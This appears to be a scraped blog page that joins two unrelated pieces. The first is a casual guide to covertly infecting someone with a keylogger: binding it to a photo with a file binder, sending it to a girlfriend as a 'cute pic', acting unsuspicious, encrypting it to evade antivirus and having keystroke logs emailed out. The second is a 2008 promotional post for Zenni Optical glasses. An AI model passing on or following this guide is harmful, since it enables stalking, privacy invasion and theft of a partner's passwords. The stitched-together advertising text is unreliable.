the best way to accomplish keylogging is to find the keylogger you want, test it in a sandbox (controlled environment ie your computer.) once youv found the one you want to send out download a file binder, i personally reccomend sfx compiler. what this allows you to do is bind your keylogger to another program or file in order to trick your victim. you can bind your keylogger to a picture of yourself, once the picture is opened so will the keylogger and it will starting logging keystrokes(in short.) this is the handy part here, bind your keylogger to a picture and send it to your girlfriend saying hey i sent you a cute pic of myself or whatever, that part is up to you, use your creativity.
Stealth
first of all dont try to be to obvious or suspicious with what your doing, make it seem as if what your pretending to do your actually doing... for example dont repeatedly urge them to open a picture you sent them or whatever.
next part is encryption. if you want some added anonymity and assurance your keylogger wont get picked up by an anti virus just encrypt it.
lastly yes people you can get the logs sent to your email its a standard feature on many keyloggers
Stylish Prescription Glasses
Posted at Monday, August 04, 2008Are you looking for affordable eyeglasses? Now there is incredible stylish new frames from Zenni through website ZenniOptical.com. This online shopping offers huge selection of frames, with single vision lens, sunsensor (potochromic)lens, tinted sunglasses lens, bifocal lens and progressive lens. Choose from a variety of high quality complete eyeglass such as Zenni Optical $ 8 Rx Eyeglasses. ZenniOptical.com provides qualified stylish prescription glasses and durability guarantee. Zenni Optical was on FOX news! Consumer reporter Melissa Painter looks into whether its products are a Deal or a Dud. What are you waiting for? visit ZenniOptical.com and get your stylish eyeglass now.